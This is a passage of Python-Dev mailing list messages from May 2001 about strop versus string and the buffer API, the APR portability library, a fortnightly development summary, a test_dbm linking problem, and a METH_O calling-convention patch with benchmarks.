It's a blue sky radical suggestion. No more, no less. :-) I mentioned it
because the IPv6 stuff came up. I already know a codebase that has handled
all the portability issues. That is a bonus :-)

However, for the platforms that APR *does* handle today, that would still be
a big code reduction for Python. And in the future? Why not extend APR to
those other platforms and reduce the Python code even more?


I think shifting Python to a portability library is actually quite an
interesting thought experiment. Enough to mention it and get people
thinking. I think it could be quite handy for the longer term
maintainability.

Cheers,
-g

-- 
Greg Stein, http://www.lyra.org/


From mal at lemburg.com  Thu May 24 16:54:24 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Thu, 24 May 2001 16:54:24 +0200
Subject: [Python-Dev] strop vs. string
References: <E14zUMI-0006ya-00@usw-pr-cvs1.sourceforge.net> <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org>
Message-ID: <3B0D20A0.3C881F89@lemburg.com>

Greg Stein wrote:
> 
> On Thu, May 24, 2001 at 12:18:50PM +0200, M.-A. Lemburg wrote:
> > Greg Stein wrote:
> >...
> > > So... my question is: is there any way that we can retain a generic find()
> > > (and similar functions from the string/strop module) that operates on any
> > > type that implements the buffer API?
> > >
> > > Maybe there is some way we can do a mixin for Python types? e.g. "this mixin
> > > implements some standard methods for 8-bit character data (using the buffer
> > > API), which can be mixed into new Python types" That would reduce the burden
> > > for new types.
> >
> > I suppose that in 2.2 we'll be able to build a class/type
> > hierarchy which then provides these possibilities. I haven't
> > followed Guido's latest checkins closely though -- could be that
> > types don't support multiple inheritance.
> 
> No idea either... that's why I asked.
> 
> > BTW, wouldn't it suffice to add these methods to buffer objects ?
> > Then you could write: buffer(ob).find('.').
> 
> You're totally missing the point with that suggestion. It does *not* suffice
> to add them to buffer objects. What about array objects? mmap objects?
> Random Joe Object who implements the buffer interface?

That's the point: you can wrap all those into a buffer object
and then use the buffer object methods to manipulate them. In
that sense, buffer objects provide an adaptor to the underlying
object which implements the needed methods.
 
> All of those are out of luck.
> 
> With strop, I can pass any of those objects to strop.find(). That function
> has a polymorphic argument.
> 
> In the current arrangement, every object must implement their own .find and
> .upper and .whatever.
> 
> Cheers,
> -g
> 
> --
> Greg Stein, http://www.lyra.org/

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From skip at pobox.com  Thu May 24 17:55:23 2001
From: skip at pobox.com (skip at pobox.com)
Date: Thu, 24 May 2001 10:55:23 -0500
Subject: [Python-Dev] strop vs. string
In-Reply-To: <20010524060016.D5402@lyra.org>
References: <E14zUMI-0006ya-00@usw-pr-cvs1.sourceforge.net>
	<20010524013349.Y5402@lyra.org>
	<3B0CE00A.488C8D73@lemburg.com>
	<20010524060016.D5402@lyra.org>
Message-ID: <15117.12011.323759.496982@beluga.mojam.com>

    Greg> With strop, I can pass any of those objects to strop.find(). That
    Greg> function has a polymorphic argument.

Where doesn't strop compile/run?  If it works everywhere, either just rename
it to be the string module (copying any bits from the existing string module
that it doesn't yet have) or rename it something like buffer_funcs.
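[For comparison: in modern Python 3, where strop is gone, the kind of polymorphic find Greg describes can be sketched with memoryview, which accepts any object that exports the buffer interface. The name buffer_find is hypothetical, and this version copies the bytes before searching; a C implementation could search the exported memory in place.]

```python
from array import array


def buffer_find(obj, sub: bytes, start: int = 0) -> int:
    """Hypothetical polymorphic find: works on any object that exports the
    buffer interface (bytes, bytearray, array.array, mmap, ...).

    memoryview(obj) raises TypeError if obj has no buffer interface.
    tobytes() copies the raw bytes; a C version could search in place.
    """
    raw = memoryview(obj).tobytes()
    return raw.find(sub, start)


print(buffer_find(b"a.b", b"."))
print(buffer_find(array("b", b"hi.there"), b"."))
```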

Skip


From skip at pobox.com  Thu May 24 17:58:24 2001
From: skip at pobox.com (skip at pobox.com)
Date: Thu, 24 May 2001 10:58:24 -0500
Subject: [Python-Dev] APR (was: IPv6)
In-Reply-To: <Pine.LNX.4.30.0105241353530.21789-100000@localhost.localdomain>
References: <20010524055555.B5402@lyra.org>
	<Pine.LNX.4.30.0105241353530.21789-100000@localhost.localdomain>
Message-ID: <15117.12192.114564.111578@beluga.mojam.com>

    >> > It currently supports: Unix (includes BeOS), Win32 and OS/2.
    >> 
    >> A lot more than that :-) Pretty much all the Unix variants, including
    >> OS/390 and BS2000 and MacOS X, and TPF, and some other oddballs.

    Michael> That's still less than Python isn't it?  RiscOS, Amiga, PalmOS,
    Michael> VMS, Playstation 2(!),

Not to mention MacOS < X... ;-)

Skip


From mwh at python.net  Thu May 24 18:38:37 2001
From: mwh at python.net (Michael Hudson)
Date: Thu, 24 May 2001 17:38:37 +0100 (BST)
Subject: [Python-Dev] python-dev summary 2001-05-10 - 2001-05-24
Message-ID: <Pine.LNX.4.30.0105241737010.21946-100000@localhost.localdomain>

 This is a summary of traffic on the python-dev mailing list between
 May 10 and May 24 (inclusive) 2001.  It is intended to inform the
 wider Python community of ongoing developments.  To comment, just
 post to python-list at python.org or comp.lang.python in the usual
 way. Give your posting a meaningful subject line, and if it's about a
 PEP, include the PEP number (e.g. Subject: PEP 201 - Lockstep
 iteration).  All python-dev members are interested in seeing ideas
 discussed by the community, so don't hesitate to take a stance on a
 PEP if you have an opinion.

 This is the eighth summary written by Michael Hudson.
 Summaries are archived at:

  <http://starship.python.net/crew/mwh/summaries/>

   Posting distribution (with apologies to mbm)

   Number of articles in summary: 322

       |                         [|]
       |                         [|]
    30 |                         [|]
       |                     [|] [|] [|]                     [|]
       |                     [|] [|] [|]                     [|]
       |                 [|] [|] [|] [|]                     [|]
       |                 [|] [|] [|] [|]                     [|]
       |     [|]         [|] [|] [|] [|] [|]                 [|]
    20 | [|] [|]         [|] [|] [|] [|] [|]                 [|]
       | [|] [|]         [|] [|] [|] [|] [|]             [|] [|]
       | [|] [|]     [|] [|] [|] [|] [|] [|]         [|] [|] [|]
       | [|] [|] [|] [|] [|] [|] [|] [|] [|]         [|] [|] [|]
       | [|] [|] [|] [|] [|] [|] [|] [|] [|]     [|] [|] [|] [|]
       | [|] [|] [|] [|] [|] [|] [|] [|] [|]     [|] [|] [|] [|]
    10 | [|] [|] [|] [|] [|] [|] [|] [|] [|]     [|] [|] [|] [|]
       | [|] [|] [|] [|] [|] [|] [|] [|] [|]     [|] [|] [|] [|]
       | [|] [|] [|] [|] [|] [|] [|] [|] [|]     [|] [|] [|] [|]
       | [|] [|] [|] [|] [|] [|] [|] [|] [|]     [|] [|] [|] [|]
       | [|] [|] [|] [|] [|] [|] [|] [|] [|]     [|] [|] [|] [|]
       | [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|]
     0 +-023-025-017-018-028-031-036-032-025-002-015-018-020-032
        Thu 10| Sat 12| Mon 14| Wed 16| Fri 18| Sun 20| Tue 22|
            Fri 11  Sun 13  Tue 15  Thu 17  Sat 19  Mon 21  Wed 23

 Pretty busy fortnight.  The above distribution may be somewhat skewed
 because I changed my subscription address to python-dev and was
 unsubscribed for a while.  Although any impact this had is probably
 countered by ESR and Barry's discussion of "Puffy the Frog"...


    * Type/class *

 Paul Prescod has been keeping an eye on Guido's descr-branch work,
 and posted concerns about when objects will have a __dict__:

  <http://mail.python.org/pipermail/python-dev/2001-May/014694.html>

 Then there was more technical discussion about subclassing builtin
 types and Steven Majewski evangelising prototype-based OO languages
 (though I'm not sure why!).


    * Easy codec access *

 Marc-Andre Lemburg checked in his decode string method patch, and
 some new codecs so you can now do things like:

    >>> "abc".encode('zlib').encode('base64')
    'eJxLTEoGAAJNASc=\n'
    >>> _.decode('base64').decode('zlib')
    'abc'
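
 Python 3 no longer accepts these bytes-to-bytes codecs in
 str.encode() ('zlib' is not a text encoding there).  A sketch of the
 same round trip through the codecs module instead, assuming Python
 3.4 or later, where the "zlib" and "base64" aliases are available:

```python
import codecs

data = b"abc"
# Compress with zlib, then base64-encode the compressed bytes.
encoded = codecs.encode(codecs.encode(data, "zlib"), "base64")
# Undo the chain in reverse order to get the original bytes back.
decoded = codecs.decode(codecs.decode(encoded, "base64"), "zlib")
print(encoded)
print(decoded)
```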

 There was a small discussion on what other codecs might be handy and
 Guido added quoted-printable to check it was easy.


    * Performance *

 The big discussion(s) on python-dev over the past fourteen days have
 centred on performance, especially on that of comparisons and the
 related area of dict performance.  It all started with Tim Peters
 running a simple test program on 2.0, 2.1 and current CVS:

  <http://mail.python.org/pipermail/python-dev/2001-May/014781.html>

 The discussion had an unusual <wink> flavour for one about
 performance: a concentration on measuring performance numbers and
 making sure that the optimizations being discussed actually improved
 these numbers.  This is hard; everyone wants to speed the "typical
 Python app" but of course there is no such thing; people have been
 using, amongst others, pystone, pybench and the test suite, none of
 which are particularly good candidates...

 Tim posted the distribution of sizes of dicts in a run of the test
 suite:

  <http://mail.python.org/pipermail/python-dev/2001-May/014890.html>

 which showed that small dicts are overwhelmingly the commonest.  Marc
 piped up with an old optimization idea of his:

  <http://mail.python.org/pipermail/python-dev/2001-May/014891.html>

 He posted a patch to sourceforge, Tim rewrote it and checked it in,
 so dicts should be a little faster in 2.2.

 But as I said, the discussion was kicked off by the performance of
 comparisons, especially strings.  Martin von Loewis posted some
 statistics from an instrumented interpreter:

  <http://mail.python.org/pipermail/python-dev/2001-May/014808.html>

 The issue is that the rich comparisons of Python 2.1 have added a
 layer of complexity to the comparisons code.  Although the rich
 comparisons (might) provide an opportunity for faster code in some
 circumstances, code that still uses old-style comparisons can and
 does take a hit.  Strings still use the old-style comparisons and are
 compared a *lot* (especially in dicts), so it seems "upgrading" them
 to rich comparisons should be a win and Marc posted a patch to sf
 that does this.
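
 A toy illustration of why equality-only comparisons can be cheaper
 (this is not Marc's patch; both function names are hypothetical): a
 three-way compare has to establish an ordering, while a dict lookup
 only needs to know whether two keys are equal.  So a rich == can
 reject strings of different lengths without reading a character.

```python
def old_style_cmp(a: str, b: str) -> int:
    """Three-way compare in the spirit of tp_compare: the full ordering is
    worked out even when the caller only wants to know about equality."""
    for x, y in zip(a, b):
        if x != y:
            return -1 if x < y else 1
    return (len(a) > len(b)) - (len(a) < len(b))


def rich_eq(a: str, b: str) -> bool:
    """Equality-only compare in the spirit of a rich '==' slot: strings of
    different lengths are rejected without examining any characters."""
    if len(a) != len(b):
        return False
    return all(x == y for x, y in zip(a, b))


print(old_style_cmp("spam", "spammer"), rich_eq("spam", "spammer"))
```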

 Marc also managed to promise <wink> to make a concerted effort to
 find speed optimizations in the next few months:

  <http://mail.python.org/pipermail/python-dev/2001-May/014928.html>

 Finally, in a coda, Jeremy noticed that Python spends an alarming
 amount of time decoding those "Oi|s#" strings that get passed to
 PyArg_ParseTuple:

  <http://mail.python.org/pipermail/python-dev/2001-May/014911.html>

 and Tim pointed out that optimizing "O" might be a win:

  <http://mail.python.org/pipermail/python-dev/2001-May/014924.html>
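
 To make the cost concrete, here is a toy Python model of what a
 PyArg_ParseTuple-style parser does on every call: it walks the format
 string character by character before the function proper runs.
 parse_tuple and parse_single_object are hypothetical names, and only
 a handful of format codes are modelled; the second function shows why
 "O" on its own is an easy special case.

```python
def parse_tuple(fmt: str, args: tuple) -> list:
    """Toy model of PyArg_ParseTuple: the format string is re-interpreted
    on every call. Supports only O (any object), i (int), s (str),
    s# (str plus its length) and | (the rest are optional)."""
    out = []
    optional = False
    i = 0      # position in fmt
    pos = 0    # position in args
    while i < len(fmt):
        code = fmt[i]
        if code == "|":
            optional = True
            i += 1
            continue
        if pos >= len(args):
            if optional:
                break
            raise TypeError("not enough arguments")
        arg = args[pos]
        if code == "O":
            out.append(arg)
        elif code == "i":
            if not isinstance(arg, int):
                raise TypeError("an integer is required")
            out.append(arg)
        elif code == "s":
            if not isinstance(arg, str):
                raise TypeError("a string is required")
            out.append(arg)
            if fmt[i + 1:i + 2] == "#":   # s# also yields the length
                out.append(len(arg))
                i += 1
        else:
            raise ValueError("unsupported format code %r" % code)
        pos += 1
        i += 1
    if pos < len(args):
        raise TypeError("too many arguments")
    return out


def parse_single_object(args: tuple):
    """Special case for the format "O": one length check, no format scan."""
    if len(args) != 1:
        raise TypeError("exactly one argument required")
    return args[0]


print(parse_tuple("Oi|s#", (None, 3, "ab")))
```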

    * FP vs. tutorial *

 Tim pointed out that the tutorial currently contains examples of
 floating point output that is platform dependent, and that this is
 bad.  He proposed changing the tutorial to only use fractions that
 can be exactly represented as floats, and adding a discussion
 (possibly in an appendix) of the reasons why

    >>> 0.1
    0.10000000000000001

 is not broken.  There was some debate about how detailed the
 explanation should be, and the point was made that it's not really
 important to explain precisely *why* this happens; it suffices to
 convince the newbie that floating point is more complicated than he
 or she thinks.  Let's hope that suitable text is composed soon, and
 that people actually read it ... there have been two "floating point
 is broken" bug reports on sourceforge in just the last week.
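
 A short Python 3 sketch of the point.  Since Python 3.1 (and 2.7),
 repr() prints the shortest string that round-trips, so 0.1 now
 displays as 0.1; formatting with 17 significant digits reproduces
 what the tutorial showed in 2001:

```python
from decimal import Decimal

# Exact value of the double nearest to 0.1:
# 0.1000000000000000055511151231257827021181583404541015625
print(Decimal(0.1))
print(format(0.1, ".17g"))   # 0.10000000000000001, as repr() printed in 2001
print(repr(0.1))             # 0.1 (shortest string that round-trips)
print(0.5 + 0.25 == 0.75)    # True: 1/2, 1/4 and 3/4 are exact binary fractions
print(0.1 + 0.2 == 0.3)      # False: all three values are approximations
```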


    * unifying os.rename semantics across platforms *

 Skip pointed out that os.rename behaves differently on Posix and
 Windows platforms when the destination file exists:

  <http://mail.python.org/pipermail/python-dev/2001-May/014957.html>

 on Posix the destination is silently replaced in an atomic operation,
 whereas on Windows an exception is raised.  Skip proposed enforcing
 Posix semantics everywhere, but this has two problems: (a) it's
 backwards incompatible, and (b) it's impossible (you can't avoid the
 race condition on Windows).  So maybe we'll just settle for better
 documentation.
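
 Python 3.3 later added os.replace(), which overwrites an existing
 destination on both POSIX and Windows, while os.rename() keeps the
 platform-dependent behaviour described above.  A small sketch (the
 helper name and file names are arbitrary):

```python
import os
import tempfile


def replace_demo() -> str:
    """Move src over an existing dst and return dst's new contents."""
    with tempfile.TemporaryDirectory() as d:
        src = os.path.join(d, "src.txt")
        dst = os.path.join(d, "dst.txt")
        with open(src, "w") as f:
            f.write("new")
        with open(dst, "w") as f:
            f.write("old")
        # os.rename(src, dst) would overwrite dst on POSIX but raise
        # FileExistsError on Windows; os.replace overwrites on both.
        os.replace(src, dst)
        with open(dst) as f:
            return f.read()


print(replace_demo())
```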


    * Python 2.1.1 *

 Thomas Wouters started back-porting bug fixes to the 2.1-maint branch
 in preparation for a 2.1.1 release.  There are as yet no firm (or
 even vague) plans about release dates.


    * Daily Python-URL on your Palm *

 Marc-Andre Lemburg announced that you can now read Pythonware's Daily
 Python-URL on your Palm Pilot as an AvantGo channel:

  <http://mail.python.org/pipermail/python-dev/2001-May/014983.html>

Cheers,
M.


From gstein at lyra.org  Thu May 24 21:45:18 2001
From: gstein at lyra.org (Greg Stein)
Date: Thu, 24 May 2001 12:45:18 -0700
Subject: [Python-Dev] strop vs. string
In-Reply-To: <3B0D20A0.3C881F89@lemburg.com>; from mal@lemburg.com on Thu, May 24, 2001 at 04:54:24PM +0200
References: <E14zUMI-0006ya-00@usw-pr-cvs1.sourceforge.net> <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org> <3B0D20A0.3C881F89@lemburg.com>
Message-ID: <20010524124518.N5402@lyra.org>

On Thu, May 24, 2001 at 04:54:24PM +0200, M.-A. Lemburg wrote:
>...
> That's the point: you can wrap all those into a buffer object
> and then use the buffer object methods to manipulate them. In
> that sense, buffer objects provide an adaptor to the underlying
> object which implements the needed methods.

That would certainly be a valid solution. And at the C level, we could share
functions between PyBufferObject and PyStringObject.

Cheers,
-g

-- 
Greg Stein, http://www.lyra.org/


From gstein at lyra.org  Thu May 24 22:07:43 2001
From: gstein at lyra.org (Greg Stein)
Date: Thu, 24 May 2001 13:07:43 -0700
Subject: [Python-Dev] APR (was: IPv6)
In-Reply-To: <15117.12192.114564.111578@beluga.mojam.com>; from skip@pobox.com on Thu, May 24, 2001 at 10:58:24AM -0500
References: <20010524055555.B5402@lyra.org> <Pine.LNX.4.30.0105241353530.21789-100000@localhost.localdomain> <15117.12192.114564.111578@beluga.mojam.com>
Message-ID: <20010524130743.O5402@lyra.org>

On Thu, May 24, 2001 at 10:58:24AM -0500, skip at pobox.com wrote:
> 
>     >> > It currently supports: Unix (includes BeOS), Win32 and OS/2.
>     >> 
>     >> A lot more than that :-) Pretty much all the Unix variants, including
>     >> OS/390 and BS2000 and MacOS X, and TPF, and some other oddballs.
> 
>     Michael> That's still less than Python isn't it?  RiscOS, Amiga, PalmOS,
>     Michael> VMS, Playstation 2(!),
> 
> Not to mention MacOS < X... ;-)

As I mentioned, MacOS X is already there. MacOS Classic is not.

But the presence of a portability library such as APR does not exclude the
use of direct platform hooks where/when necessary. For a bunch of stuff, you
use APR [to reduce complexity/maintenance]. For the rest, you go native just
like today.

Cheers,
-g

-- 
Greg Stein, http://www.lyra.org/


From skip at pobox.com  Thu May 24 23:15:48 2001
From: skip at pobox.com (skip at pobox.com)
Date: Thu, 24 May 2001 16:15:48 -0500
Subject: [Python-Dev] Odd message from test_dbm
Message-ID: <15117.31236.804746.160037@beluga.mojam.com>

I just noticed this message when running make test:

    test test_dbm skipped --  /home/skip/src/python/dist/src/build/build/lib.linux-i686-2.1/dbm.so: undefined symbol: dbm_firstkey

I'm running a vanilla Mandrake 8.0 system.  Unfortunately, I can't check
libc.so or /usr/lib/libgdbm.so because the Mandrake folks saw fit to strip
them...

Anybody else seen this?  

Skip


From thomas at xs4all.net  Thu May 24 23:42:58 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Thu, 24 May 2001 23:42:58 +0200
Subject: [Python-Dev] Odd message from test_dbm
In-Reply-To: <15117.31236.804746.160037@beluga.mojam.com>; from skip@pobox.com on Thu, May 24, 2001 at 04:15:48PM -0500
References: <15117.31236.804746.160037@beluga.mojam.com>
Message-ID: <20010524234258.I690@xs4all.nl>

On Thu, May 24, 2001 at 04:15:48PM -0500, skip at pobox.com wrote:

> I just noticed this message when running make test:

>     test test_dbm skipped --  /home/skip/src/python/dist/src/build/build/lib.linux-i686-2.1/dbm.so: undefined symbol: dbm_firstkey

> I'm running a vanilla Mandrake 8.0 system.  Unfortunately, I can't check
> libc.so or /usr/lib/libgdbm.so because the Mandrake folks saw fit to strip
> them...

The problem is that the dbmmodule isn't linked to the right library. Debian
has a similar (if not the same) problem. setup.py doesn't try hard enough to
figure out the right library to link with; it checks for libndbm, but not
libdbm or libgdbm (it assumes DBM support is in libc if not in libndbm).
I *think* all it needs to do is check for libdbm as well as libndbm, but
this might pick up old/incompatible libraries on some platforms, and it
might still require fiddling of include paths on others. I seem to recall
you had to include either /usr/include/db1/ndbm.h (to use libdbm) or
/usr/include/gdbm/ndbm.h or /usr/include/gdbm-ndbm.h (to use gdbm's ndbm
'emulation') but I gave up in frustration trying to figure out the
difference :P

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From greg at cosc.canterbury.ac.nz  Fri May 25 04:45:01 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Fri, 25 May 2001 14:45:01 +1200 (NZST)
Subject: [Python-Dev] strop vs. string
In-Reply-To: <3B0CE00A.488C8D73@lemburg.com>
Message-ID: <200105250245.OAA00640@s454.cosc.canterbury.ac.nz>

"M.-A. Lemburg" <mal at lemburg.com>:

> BTW, wouldn't it suffice to add these methods to buffer objects ?
> Then you could write: buffer(ob).find('.').

Aren't buffer objects as they're currently implemented
inherently dangerous?

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From martin at loewis.home.cs.tu-berlin.de  Fri May 25 08:00:47 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Fri, 25 May 2001 08:00:47 +0200
Subject: [Python-Dev] Special-casing "O"
Message-ID: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de>

> Special-casing the snot out of "O" looks like a winner <wink>:

I have a patch on SF that takes this approach:

http://sourceforge.net/tracker/index.php?func=detail&aid=427190&group_id=5470&atid=305470

The idea is that functions can be declared as METH_O, instead of
METH_VARARGS. I also offer METH_l, but this is currently not used. The
approach could be extended to other signatures, e.g. METH_O_opt_O
(i.e. "O|O").  Some signatures cannot be changed into special-calls,
e.g. "O!", or "ll|l".

In the PyXML test suite, "O" is indeed the most frequent case (72%),
and it is primarily triggered through len (26%), append (24%), and ord
(6%). These are the only functions that make use of the new calling
conventions at the moment. If you look at the patch, you'll see that
it is quite easy to change a method to use a different calling
convention (basically just remove the PyArg_ParseTuple call).
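
[The calling-convention split can be modelled in a few lines of Python. The flag values and function names below are stand-ins chosen for illustration, not CPython's C code; the point is only that with METH_O the interpreter checks the argument count once and hands over the single object, so the callee no longer parses a tuple.]

```python
# Stand-in values for the C method-table flags (illustrative only).
METH_VARARGS = 1
METH_O = 8


def call_builtin(flags, func, self, args: tuple):
    """Model of dispatching on a method's declared calling convention."""
    if flags == METH_VARARGS:
        # func receives the whole tuple and must unpack it itself, the way
        # C code calls PyArg_ParseTuple(args, "O", &obj).
        return func(self, args)
    if flags == METH_O:
        # The caller checks the arity once and passes the object directly.
        if len(args) != 1:
            raise TypeError("%s() takes exactly one argument (%d given)"
                            % (func.__name__, len(args)))
        return func(self, args[0])
    raise ValueError("unknown calling convention")


def listappend_varargs(self, args):
    (obj,) = args          # the unpacking step that METH_O removes
    self.append(obj)


def listappend_o(self, obj):
    self.append(obj)


items = []
call_builtin(METH_O, listappend_o, items, (3,))
call_builtin(METH_VARARGS, listappend_varargs, items, (4,))
print(items)
```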

To measure the patch, I use the script

from time import clock

indices = [1] * 20000
indices1 = indices*100
r1 = [1]*60

def doit(case):
    s = clock()
    i = 0
    if case == 0:
        f = ord
        for i in indices1:
            f("o")
    elif case == 1:
        for i in indices:
            l = []
            f = l.append
            for i in r1:
                f(i)
    elif case == 2:
        f = len
        for i in indices1:
            f("o")
    f = clock()
    return f - s

for i in xrange(10):
    print "%.3f %.3f %.3f" % (doit(0),doit(1),doit(2))

Without the patch, (almost) stock CVS gives

2.190 1.800 2.240
2.200 1.800 2.220
2.200 1.800 2.230
2.220 1.800 2.220
2.200 1.800 2.220
2.200 1.790 2.240
2.200 1.790 2.230
2.200 1.800 2.220
2.200 1.800 2.240
2.200 1.790 2.230

With the patch, I get

1.440 1.330 1.460
1.420 1.350 1.440
1.430 1.340 1.430
1.510 1.350 1.460
1.440 1.360 1.470
1.460 1.330 1.450
1.430 1.330 1.420
1.440 1.340 1.440
1.430 1.340 1.430
1.410 1.340 1.450

So the speed-up is roughly 30% to 50%, depending on how much work the
function has to do.
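
[time.clock() was removed in Python 3.8, so the script above no longer runs on current interpreters. A Python 3 port, assuming time.perf_counter() as the replacement timer, keeps the same three cases (ord, list.append, len); its absolute numbers will of course not match the 2001 figures.]

```python
from time import perf_counter

INDICES = [1] * 20000
INDICES1 = INDICES * 100
R1 = [1] * 60


def doit(case: int) -> float:
    """Time one of the three micro-benchmarks; returns elapsed seconds."""
    start = perf_counter()
    if case == 0:              # ord() on a one-character string
        f = ord
        for _ in INDICES1:
            f("o")
    elif case == 1:            # list.append(): builds 20000 lists of 60 items
        for _ in INDICES:
            lst = []
            f = lst.append
            for item in R1:
                f(item)
    elif case == 2:            # len() on a one-character string
        f = len
        for _ in INDICES1:
            f("o")
    return perf_counter() - start


def main(rounds: int = 10) -> None:
    for _ in range(rounds):
        print("%.3f %.3f %.3f" % (doit(0), doit(1), doit(2)))
```

Calling main() prints rows in the same "ord append len" column order as the results above.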

Please let me know what you think.

Regards,
Martin


From mal at lemburg.com  Fri May 25 10:23:10 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Fri, 25 May 2001 10:23:10 +0200
Subject: [Python-Dev] strop vs. string
References: <200105250245.OAA00640@s454.cosc.canterbury.ac.nz>
Message-ID: <3B0E166E.581816AA@lemburg.com>

Greg Ewing wrote:
> 
> "M.-A. Lemburg" <mal at lemburg.com>:
> 
> > BTW, wouldn't it suffice to add these methods to buffer objects ?
> > Then you could write: buffer(ob).find('.').
> 
> Aren't buffer objects as they're currently implemented
> inherently dangerous?

Why should they be ?

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Fri May 25 10:56:12 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Fri, 25 May 2001 10:56:12 +0200
Subject: [Python-Dev] Special-casing "O"
References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de>
Message-ID: <3B0E1E2C.4BC121B5@lemburg.com>

"Martin v. Loewis" wrote:
> 
> > Special-casing the snot out of "O" looks like a winner <wink>:
> 
> I have a patch on SF that takes this approach:
> 
> http://sourceforge.net/tracker/index.php?func=detail&aid=427190&group_id=5470&atid=305470
> 
> The idea is that functions can be declared as METH_O, instead of
> METH_VARARGS. I also offer METH_l, but this is currently not used. The
> approach could be extended to other signatures, e.g. METH_O_opt_O
> (i.e. "O|O").  Some signatures cannot be changed into special-calls,
> e.g. "O!", or "ll|l".
> 
> [benchmark]
> So the speed-up is roughly 30% to 50%, depending on how much work the
> function has to do.
> 
> Please let me know what you think.

Great idea, Martin.

One suggestion, though: I would change the way the
function is "declared" in the method list. You currently use:

 {"append", (PyCFunction)listappend,  METH_O, append_doc},

Now this would be more flexible if you would implement a scheme
which lets us put the parser string into the method list. The
call mechanism could then easily figure out how to call the
method and it would also be more easily extensible:

 {"append", (PyCFunction)listappend,  METH_DIRECT, append_doc, "O"},

This would then (just like in your patch) call the listappend
function with the parser arguments inlined into the C call:

 listappend(self, arg0)

A parser marker "OO" would then call a method like this:

 method(self, arg0, arg1)

and so on.

This approach costs a little more (the string compare), but
should provide a more direct way of converting existing
functions to the new convention (just copy&paste the PyArg_ParseTuple()
argument) and also allows implementing a generic scheme which
then again relies on PyArg_ParseTuple() to do the argument
parsing, e.g. "is#" could be implemented as:

PyObject *method(PyObject *self, int arg0, char *arg1, int *arg1_len)

For optional arguments we'd need some convention which then
lets the called function add the default value as needed.
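
[A rough Python model of this proposal, assuming a hypothetical MethodDef record that stores the format string next to the function. Only formats made entirely of "O" codes are dispatched directly; anything else would need the general parser.]

```python
from typing import Callable, NamedTuple


class MethodDef(NamedTuple):
    """Hypothetical method-table entry that also carries a format string,
    modelled on the proposed {name, func, METH_DIRECT, doc, "O"} layout."""
    name: str
    func: Callable
    doc: str
    fmt: str


def call_direct(entry: MethodDef, self, args: tuple):
    """Call entry.func with the arguments inlined:
    "O" -> func(self, a0), "OO" -> func(self, a0, a1), and so on."""
    fmt = entry.fmt
    if set(fmt) <= {"O"}:
        if len(args) != len(fmt):
            raise TypeError("%s() takes exactly %d arguments (%d given)"
                            % (entry.name, len(fmt), len(args)))
        return entry.func(self, *args)
    raise NotImplementedError("format %r needs the general parser" % fmt)


append_def = MethodDef("append", lambda self, x: self.append(x), "append doc", "O")
target = []
call_direct(append_def, target, (1,))
print(target)
```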

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From ping at lfw.org  Fri May 25 12:56:33 2001
From: ping at lfw.org (Ka-Ping Yee)
Date: Fri, 25 May 2001 05:56:33 -0500 (CDT)
Subject: [Python-Dev] May 25 is Towel Day (towelday.org)
Message-ID: <Pine.LNX.4.10.10105250556050.19548-100000@server1.lfw.org>

If you have enjoyed Douglas Adams' works, please consider carrying
or wearing a towel with you everywhere today, May 25, as a tribute
and in his memory.

For more about Towel Day, visit http://www.towelday.org/.

My apologies for being off-topic.


-- ?!ng


From gstein at lyra.org  Fri May 25 13:59:23 2001
From: gstein at lyra.org (Greg Stein)
Date: Fri, 25 May 2001 04:59:23 -0700
Subject: [Python-Dev] strop vs. string
In-Reply-To: <3B0E166E.581816AA@lemburg.com>; from mal@lemburg.com on Fri, May 25, 2001 at 10:23:10AM +0200
References: <200105250245.OAA00640@s454.cosc.canterbury.ac.nz> <3B0E166E.581816AA@lemburg.com>
Message-ID: <20010525045923.C12056@lyra.org>

On Fri, May 25, 2001 at 10:23:10AM +0200, M.-A. Lemburg wrote:
> Greg Ewing wrote:
> > "M.-A. Lemburg" <mal at lemburg.com>:
> > 
> > > BTW, wouldn't it suffice to add these methods to buffer objects ?
> > > Then you could write: buffer(ob).find('.').
> > 
> > Aren't buffer objects as they're currently implemented
> > inherently dangerous?
> 
> Why should they be ?

The buffer object caches the pointer from getreadbuffer and friends. If the
target object changes that pointer (internally), then the buffer object's
value is stale.

But that is a bug fix; it is independent of the discussion at hand.
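
[For what it is worth, Python 3's memoryview, which replaced buffer, avoids this particular stale-pointer problem, at least for bytearray, by having the exporting object refuse to resize while a view is alive. A minimal sketch (the helper name is arbitrary):]

```python
def resize_while_viewed():
    """Try to grow a bytearray while a memoryview of it exists."""
    buf = bytearray(b"hello")
    view = memoryview(buf)        # buf now has an active export
    try:
        buf.extend(b" world")     # growing could move the memory...
        outcome = "resized"
    except BufferError:           # ...so bytearray refuses while exported
        outcome = "refused"
    view.release()                # drop the export
    buf.extend(b" world")         # now resizing is allowed
    return outcome, bytes(buf)


print(resize_while_viewed())
```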

Cheers,
-g

-- 
Greg Stein, http://www.lyra.org/


From Barrett at stsci.edu  Fri May 25 15:21:20 2001
From: Barrett at stsci.edu (Paul Barrett)
Date: Fri, 25 May 2001 09:21:20 -0400
